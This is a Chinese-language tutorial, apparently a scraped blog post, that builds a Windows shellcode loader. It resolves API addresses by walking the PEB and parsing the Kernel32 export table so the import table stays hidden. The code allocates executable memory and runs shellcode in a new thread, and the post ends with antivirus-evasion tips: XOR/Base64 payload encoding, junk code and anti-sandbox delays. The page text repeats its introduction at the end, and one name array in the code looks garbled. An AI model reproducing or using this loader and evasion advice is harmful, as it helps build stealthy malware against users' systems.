通过PEB动态获取API执行Shellcode技术详解<\/h1>

前言<\/h2>
本文详细讲解如何从进程的TEB获取PEB，再从PEB中的LDR模块链表获取Kernel32.dll模块基址，然后通过解析PE文件结构动态获取API函数地址，最终执行Shellcode的技术。这种方法可以隐藏IAT表，提高恶意代码的隐蔽性。<\/p>

技术原理<\/h2>

1. PEB和TEB结构<\/h3>

TEB (Thread Environment Block)<\/strong>: 线程环境块，每个线程都有一个TEB<\/li>
PEB (Process Environment Block)<\/strong>: 进程环境块，包含进程信息<\/li>

通过FS寄存器可以访问TEB，TEB偏移0x30处存储PEB指针<\/li> <\/ul>
2. PEB_LDR_DATA结构<\/h3>
PEB偏移0x0C处存储LDR信息，LDR包含三个双向链表：<\/p>

InLoadOrderModuleList: 按加载顺序排列的模块列表<\/li>
InMemoryOrderModuleList: 按内存顺序排列的模块列表<\/li>
InInitializationOrderModuleList: 按初始化顺序排列的模块列表<\/li> <\/ul>
3. PE文件结构<\/h3>
PE文件由以下几部分组成：<\/p>

DOS头<\/li>
NT头(PE头)

文件头<\/li>
可选头<\/li> <\/ul> <\/li>
节表<\/li>
节数据<\/li> <\/ul>
DOS头结构<\/h4>
typedef<\/span> struct<\/span> _IMAGE_DOS_HEADER { <\/span><\/span> WORD e_magic; \/\/ "MZ"标识 <\/span><\/span><\/span><\/span> \/\/ ...其他成员... <\/span><\/span><\/span><\/span> LONG e_lfanew; \/\/ 指向PE头的偏移 <\/span><\/span><\/span><\/span>} IMAGE_DOS_HEADER, *<\/span>PIMAGE_DOS_HEADER; <\/span><\/span><\/code><\/pre>NT头结构<\/h4> typedef<\/span> struct<\/span> _IMAGE_NT_HEADERS { <\/span><\/span> DWORD Signature; \/\/ "PE\0\0" <\/span><\/span><\/span><\/span> IMAGE_FILE_HEADER FileHeader; <\/span><\/span> IMAGE_OPTIONAL_HEADER32 OptionalHeader; <\/span><\/span>} IMAGE_NT_HEADERS32, *<\/span>PIMAGE_NT_HEADERS32; <\/span><\/span><\/code><\/pre>导出表结构<\/h4> typedef<\/span> struct<\/span> _IMAGE_EXPORT_DIRECTORY { <\/span><\/span> DWORD Characteristics; <\/span><\/span> DWORD TimeDateStamp; <\/span><\/span> WORD MajorVersion; <\/span><\/span> WORD MinorVersion; <\/span><\/span> DWORD Name; <\/span><\/span> DWORD Base; <\/span><\/span> DWORD NumberOfFunctions; <\/span><\/span> DWORD NumberOfNames; <\/span><\/span> DWORD AddressOfFunctions; \/\/ 函数地址表 <\/span><\/span><\/span><\/span> DWORD AddressOfNames; \/\/ 函数名称表 <\/span><\/span><\/span><\/span> DWORD AddressOfNameOrdinals; \/\/ 函数序号表 <\/span><\/span><\/span><\/span>} IMAGE_EXPORT_DIRECTORY, *<\/span>PIMAGE_EXPORT_DIRECTORY; <\/span><\/span><\/code><\/pre>实现步骤<\/h2> 1. 获取PEB地址<\/h3> DWORD GetPeb<\/span>() { <\/span><\/span> _PEB_LDR_DATA*<\/span> Ldr; <\/span><\/span> _asm { <\/span><\/span> push eax <\/span><\/span> push ebx <\/span><\/span> xor eax, eax <\/span><\/span> xor ebx, ebx <\/span><\/span> mov eax, fs:[0x30<\/span>] \/\/ TEB偏移0x30处是PEB <\/span><\/span><\/span><\/span> mov ebx, [eax +<\/span> 0x0C<\/span>] \/\/ PEB偏移0x0C处是LDR <\/span><\/span><\/span><\/span> mov Ldr, ebx <\/span><\/span> pop ebx <\/span><\/span> pop eax <\/span><\/span> } <\/span><\/span> return<\/span> (DWORD)Ldr; <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 获取Kernel32.dll模块基址<\/h3> DWORD GetKenel32<\/span>(DWORD Ldr) { <\/span><\/span> char<\/span> funcName[] =<\/span> {'K'<\/span>,0<\/span>,'e'<\/span>,0<\/span>,'l'<\/span>,0<\/span>,'n'<\/span>,0<\/span>,'e'<\/span>,0<\/span>,'l'<\/span>,'0'<\/span>,'3'<\/span>,'2'<\/span>,0<\/span>,'.'<\/span>,'0'<\/span>,'d'<\/span>,'0'<\/span>,'l'<\/span>,'0'<\/span>,'l'<\/span>,0<\/span>,0<\/span>,0<\/span>}; <\/span><\/span> DWORD kernel32Addr =<\/span> NULL; <\/span><\/span> <\/span><\/span> _LIST_ENTRY*<\/span> pBack; <\/span><\/span> _PEB_LDR_DATA*<\/span> pLdr =<\/span> (_PEB_LDR_DATA*<\/span>)Ldr; <\/span><\/span> _LDR_DATA_TABLE_ENTRY*<\/span> pNext; <\/span><\/span> <\/span><\/span> pBack =<\/span> &<\/span>pLdr-><\/span>InLoadOrderModuleList; <\/span><\/span> pNext =<\/span> (_LDR_DATA_TABLE_ENTRY*<\/span>)pBack-><\/span>Flink; <\/span><\/span> <\/span><\/span> while<\/span> ((int<\/span>*<\/span>)pBack !=<\/span> (int<\/span>*<\/span>)pNext) { <\/span><\/span> PCHAR BaseDllName =<\/span> (PCHAR)pNext-><\/span>BaseDllName.Buffer; <\/span><\/span> PCHAR pfuncName =<\/span> (PCHAR)funcName; <\/span><\/span> <\/span><\/span> while<\/span> (*<\/span>BaseDllName &&<\/span> *<\/span>BaseDllName ==<\/span> *<\/span>pfuncName) { <\/span><\/span> BaseDllName++<\/span>; pfuncName++<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> if<\/span> (*<\/span>BaseDllName ==<\/span> *<\/span>pfuncName) { <\/span><\/span> kernel32Addr =<\/span> (DWORD)pNext-><\/span>DllBase; <\/span><\/span> break<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> pNext =<\/span> (_LDR_DATA_TABLE_ENTRY*<\/span>)pNext-><\/span>InLoadOrderLinks.Flink; <\/span><\/span> } <\/span><\/span> return<\/span> kernel32Addr; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 获取函数地址<\/h3> DWORD GetFuncAddr<\/span>(HMODULE Module) { <\/span><\/span> CHAR funcName[] =<\/span> {'G'<\/span>,'e'<\/span>,'t'<\/span>,'P'<\/span>,'r'<\/span>,'o'<\/span>,'c'<\/span>,'A'<\/span>,'d'<\/span>,'d'<\/span>,'r'<\/span>,'e'<\/span>,'s'<\/span>,'s'<\/span>,0<\/span>}; <\/span><\/span> <\/span><\/span> \/\/ 获取DOS头 <\/span><\/span><\/span><\/span> PIMAGE_DOS_HEADER dosHeader =<\/span> (PIMAGE_DOS_HEADER)Module; <\/span><\/span> <\/span><\/span> \/\/ 获取NT头 <\/span><\/span><\/span><\/span> PIMAGE_NT_HEADERS ntHeader =<\/span> (PIMAGE_NT_HEADERS)((DWORD)dosHeader +<\/span> dosHeader-><\/span>e_lfanew); <\/span><\/span> <\/span><\/span> \/\/ 获取导出表 <\/span><\/span><\/span><\/span> PIMAGE_EXPORT_DIRECTORY exportDirectory =<\/span> (PIMAGE_EXPORT_DIRECTORY) <\/span><\/span> ((DWORD)dosHeader +<\/span> ntHeader-><\/span>OptionalHeader.DataDirectory[0<\/span>].VirtualAddress); <\/span><\/span> <\/span><\/span> \/\/ 获取三个表 <\/span><\/span><\/span><\/span> DWORD*<\/span> AddressOfNames =<\/span> (DWORD*<\/span>)((DWORD)dosHeader +<\/span> exportDirectory-><\/span>AddressOfNames); <\/span><\/span> WORD*<\/span> AddressOfNameOrdinals =<\/span> (WORD*<\/span>)((DWORD)dosHeader +<\/span> exportDirectory-><\/span>AddressOfNameOrdinals); <\/span><\/span> DWORD*<\/span> AddressOfFunctions =<\/span> (DWORD*<\/span>)((DWORD)dosHeader +<\/span> exportDirectory-><\/span>AddressOfFunctions); <\/span><\/span> <\/span><\/span> PCHAR pfuncName =<\/span> funcName; <\/span><\/span> <\/span><\/span> \/\/ 遍历查找函数 <\/span><\/span><\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> exportDirectory-><\/span>NumberOfNames; i++<\/span>) { <\/span><\/span> PCHAR lpName =<\/span> (PCHAR)((DWORD)dosHeader +<\/span> AddressOfNames[i]); <\/span><\/span> while<\/span> (*<\/span>lpName &&<\/span> *<\/span>lpName ==<\/span> *<\/span>pfuncName) { <\/span><\/span> lpName++<\/span>; pfuncName++<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> if<\/span> (*<\/span>lpName ==<\/span> *<\/span>pfuncName) { <\/span><\/span> return<\/span> (DWORD)((DWORD)dosHeader +<\/span> <\/span><\/span> AddressOfFunctions[AddressOfNameOrdinals[i]]); <\/span><\/span> } <\/span><\/span> <\/span><\/span> pfuncName =<\/span> funcName; <\/span><\/span> } <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>4. 主程序执行流程<\/h3> int<\/span> main<\/span>() { <\/span><\/span> \/\/ 1. 获取Kernel32.dll基址 <\/span><\/span><\/span><\/span> HMODULE hKernel32 =<\/span> (HMODULE)GetKenel32(GetPeb()); <\/span><\/span> <\/span><\/span> \/\/ 2. 获取GetProcAddress函数地址 <\/span><\/span><\/span><\/span> PGETPROCADDRESS pGetProcAddress =<\/span> (PGETPROCADDRESS)GetFuncAddr(hKernel32); <\/span><\/span> <\/span><\/span> \/\/ 3. 动态获取其他API <\/span><\/span><\/span><\/span> VIRTUALALLOC myVirtualAlloc =<\/span> (VIRTUALALLOC)pGetProcAddress(hKernel32, "VirtualAlloc"<\/span>); <\/span><\/span> RTLMOVEMEMORY myRtlMoveMemory =<\/span> (RTLMOVEMEMORY)pGetProcAddress(hKernel32, "RtlMoveMemory"<\/span>); <\/span><\/span> CREATETHREAD myCreateThread =<\/span> (CREATETHREAD)pGetProcAddress(hKernel32, "CreateThread"<\/span>); <\/span><\/span> WAITFORSINGLEOBJECT myWaitForSingleObject =<\/span> (WAITFORSINGLEOBJECT)pGetProcAddress(hKernel32, "WaitForSingleObject"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 4. 执行Shellcode <\/span><\/span><\/span><\/span> unsigned<\/span> char<\/span> buf[] =<\/span> "shellcode here"<\/span>; <\/span><\/span> LPVOID lpMem =<\/span> myVirtualAlloc(NULL, sizeof<\/span>(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> myRtlMoveMemory(lpMem, buf, sizeof<\/span>(buf)); <\/span><\/span> HANDLE hThread =<\/span> myCreateThread(0<\/span>, 0<\/span>, (LPTHREAD_START_ROUTINE)lpMem, 0<\/span>, 0<\/span>, 0<\/span>); <\/span><\/span> myWaitForSingleObject(hThread, INFINITE); <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>免杀技巧<\/h2> Shellcode处理<\/strong>:<\/p> 使用异或加密Shellcode<\/li> 使用Base64编码Shellcode<\/li> 运行时解密执行<\/li> <\/ul> <\/li> 代码混淆<\/strong>:<\/p> 使用不常见的API获取方式<\/li> 添加无用代码干扰分析<\/li> 使用动态计算代替硬编码<\/li> <\/ul> <\/li> 反沙箱技术<\/strong>:<\/p> 添加环境检测代码<\/li> 延迟执行<\/li> 只在特定条件下触发<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 本文详细讲解了如何通过PEB获取Kernel32.dll基址，解析PE文件结构动态获取API函数地址，最终执行Shellcode的技术。这种方法具有以下优点：<\/p> 不依赖导入表，隐蔽性高<\/li> 可以绕过部分杀毒软件的静态检测<\/li> 灵活性强，可以动态获取任意API<\/li> <\/ol> 在实际应用中，还需要结合加密、混淆等技术提高免杀效果。需要注意的是，这种技术常被恶意软件使用，学习时应遵守法律法规，仅用于安全研究和防御目的。<\/p>

通过PEB动态获取API执行Shellcode技术详解<\/h1>

前言<\/h2> 本文详细讲解如何从进程的TEB获取PEB，再从PEB中的LDR模块链表获取Kernel32.dll模块基址，然后通过解析PE文件结构动态获取API函数地址，最终执行Shellcode的技术。这种方法可以隐藏IAT表，提高恶意代码的隐蔽性。<\/p>

技术原理<\/h2>

实现步骤<\/h2>

前言<\/h2>
本文详细讲解如何从进程的TEB获取PEB，再从PEB中的LDR模块链表获取Kernel32.dll模块基址，然后通过解析PE文件结构动态获取API函数地址，最终执行Shellcode的技术。这种方法可以隐藏IAT表，提高恶意代码的隐蔽性。<\/p>